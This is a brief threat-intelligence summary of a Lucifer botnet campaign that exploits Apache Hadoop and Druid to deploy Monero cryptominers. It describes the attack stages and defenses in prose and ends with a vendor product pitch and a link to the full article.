Lucifer DDoS botnet Malware is Targeting Apache Big-Data Stack
Aqua Nautilus has identified a new campaign targeting Apache big-data stack, specifically Apache Hadoop and Apache Druid, by exploiting misconfigurations and vulnerabilities. The campaign uses a variant of the Lucifer DDoS botnet malware to transform vulnerable Linux systems into Monero cryptomining bots. The malware campaign has evolved over time, initially involving a single dropper and cryptominer, then two binaries with only one executed, and finally two droppers with one executing the cryptominer. The malware is capable of command and control operations, self-propagation through multiple vulnerabilities, credential brute-forcing, and deploying backdoors for intranet infections. The attack flow begins with the exploitation of a misconfiguration or vulnerability, followed by downloading and executing the Lucifer malware, and finally downloading and executing the main payload, an XMRig cryptominer. Persistence is achieved by scheduling jobs to execute the attack, while defense evasion includes binary deletion, packing binaries, and truncating logs. System information is gathered to support mining operations, and the impact is primarily resource hijacking for cryptomining activity. Aqua's Cloud Native Application Protection Platform (CNAPP) provides protection against such threats by scanning for vulnerabilities, malware, hidden secrets, configuration errors, and open-source license issues. It integrates with CI/CD pipelines to ensure only authorized images are deployed and offers runtime controls to protect against exploit attempts in real-time. To protect environments from such attacks, it is recommended to keep systems updated, properly configure environments, use runtime detection and response solutions to identify unknown threats, and be cautious when using open-source libraries. Indicators of Compromise (IOCs) associated with the Lucifer malware campaign are provided for further investigation and defense. Malware: Lucifer CVEs: CVE-2021-25646 [View Article](https://blog.aquasec.com/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack)